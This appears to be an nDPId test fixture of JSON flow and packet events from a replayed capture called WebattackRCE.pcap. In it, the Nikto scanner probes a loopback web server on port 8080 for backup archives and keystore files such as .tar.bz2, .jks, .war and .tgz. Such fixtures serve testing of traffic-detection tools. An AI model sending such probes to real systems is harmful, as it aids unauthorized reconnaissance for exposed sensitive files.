-01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":301,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":301,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277157,"flow_last_seen":1576420277157,"flow_idle_time":7440000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420277157,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50146,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":302,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":302,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277159,"flow_last_seen":1576420277159,"flow_idle_time":7440000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420277159,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50148,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":302,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":302,"flow_packet_id":1,"flow_last_seen":1576420277159,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":215,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":215,"pkt_l4_len":181,"thread_ts_msec":1576420277159,"pkt":"AAAAAAAAAAAAAAAACABFAADJ4mhAAEAGWcR\/AAABfwAAAcPkH5ACw9rweorXCIAYAED+vQAAAQEICp1m\/M+dZvzPR0VUIC8xMjcuMC4wLjEudGFyLmJ6MiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":302,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":302,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277159,"flow_last_seen":1576420277159,"flow_idle_time":7440000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420277159,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50148,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":303,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":303,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277160,"flow_last_seen":1576420277160,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277160,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50150,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":303,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":303,"flow_packet_id":1,"flow_last_seen":1576420277160,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277160,"pkt":"AAAAAAAAAAAAAAAACABFAAC9m2BAAEAGoNh\/AAABfwAAAcPmH5DB5aPVANERlIAYAED+sQAAAQEICp1m\/NCdZvzQR0VUIC8xLnRhciBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":303,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":303,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277160,"flow_last_seen":1576420277160,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277160,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50150,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":304,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":304,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277162,"flow_last_seen":1576420277162,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277162,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50152,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":304,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":304,"flow_packet_id":1,"flow_last_seen":1576420277162,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277162,"pkt":"AAAAAAAAAAAAAAAACABFAAC9DilAAEAGLhB\/AAABfwAAAcPoH5AB6DautSQRQ4AYAED+sQAAAQEICp1m\/NKdZvzRR0VUIC8xLnRhciBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} 
-01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":304,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":304,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277162,"flow_last_seen":1576420277162,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277162,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50152,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":305,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":305,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277164,"flow_last_seen":1576420277164,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277164,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50154,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":305,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":305,"flow_packet_id":1,"flow_last_seen":1576420277164,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277164,"pkt":"AAAAAAAAAAAAAAAACABFAADFIABAAEAGHDF\/AAABfwAAAcPqH5Cuoid2XcqpP4AYAED+uQAAAQEICp1m\/NSdZvzTR0VUIC8xMjcwMC50YXIuYnoyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":305,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":305,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277164,"flow_last_seen":1576420277164,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277164,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50154,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":306,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":306,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277165,"flow_last_seen":1576420277165,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277165,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50156,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":306,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":306,"flow_packet_id":1,"flow_last_seen":1576420277165,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277165,"pkt":"AAAAAAAAAAAAAAAACABFAADFxNJAAEAGd15\/AAABfwAAAcPsH5ANevxccArVDoAYAED+uQAAAQEICp1m\/NWdZvzVR0VUIC8xMjcwMC50YXIuYnoyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":306,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":306,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277165,"flow_last_seen":1576420277165,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277165,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50156,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":307,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":307,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277166,"flow_last_seen":1576420277166,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277166,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50158,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":307,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":307,"flow_packet_id":1,"flow_last_seen":1576420277166,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277166,"pkt":"AAAAAAAAAAAAAAAACABFAADFbqBAAEAGzZB\/AAABfwAAAcPuH5Bs\/lYWJw4fzoAYAED+uQAAAQEICp1m\/NadZvzWR0VUIC8xMjcuMC4wLjEuamtzIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
-01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":307,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":307,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277166,"flow_last_seen":1576420277166,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277166,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50158,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":308,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":308,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277168,"flow_last_seen":1576420277168,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277168,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50160,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":308,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":308,"flow_packet_id":1,"flow_last_seen":1576420277168,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277168,"pkt":"AAAAAAAAAAAAAAAACABFAADFNC9AAEAGCAJ\/AAABfwAAAcPwH5DG1AyisQj3YYAYAED+uQAAAQEICp1m\/NidZvzYR0VUIC8xMjcuMC4wLjEuamtzIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":308,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":308,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277168,"flow_last_seen":1576420277168,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277168,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50160,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":309,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":309,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277170,"flow_last_seen":1576420277170,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277170,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50162,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":309,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":309,"flow_packet_id":1,"flow_last_seen":1576420277170,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277170,"pkt":"AAAAAAAAAAAAAAAACABFAADDKQdAAEAGEyx\/AAABfwAAAcPyH5DtUBGKsAbmZ4AYAED+twAAAQEICp1m\/NqdZvzZR0VUIC8xMjcuMC4wLndhciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":309,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":309,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277170,"flow_last_seen":1576420277170,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277170,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50162,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":310,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":310,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277171,"flow_last_seen":1576420277171,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277171,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50164,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":310,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":310,"flow_packet_id":1,"flow_last_seen":1576420277171,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277171,"pkt":"AAAAAAAAAAAAAAAACABFAADDFtRAAEAGJV9\/AAABfwAAAcP0H5DIKS5flUY6Y4AYAED+twAAAQEICp1m\/NudZvzbR0VUIC8xMjcuMC4wLndhciBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} 
-01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":310,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":310,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277171,"flow_last_seen":1576420277171,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277171,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50164,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":311,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":311,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277172,"flow_last_seen":1576420277172,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277172,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50166,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":311,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":311,"flow_packet_id":1,"flow_last_seen":1576420277172,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277172,"pkt":"AAAAAAAAAAAAAAAACABFAADBjc9AAEAGrmV\/AAABfwAAAcP2H5CR+bVBDfA+SoAYAED+tQAAAQEICp1m\/NydZvzcR0VUIC8xMjcuMC50Z3ogSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":311,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":311,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277172,"flow_last_seen":1576420277172,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277172,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50166,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":312,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":312,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277173,"flow_last_seen":1576420277173,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277173,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50168,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 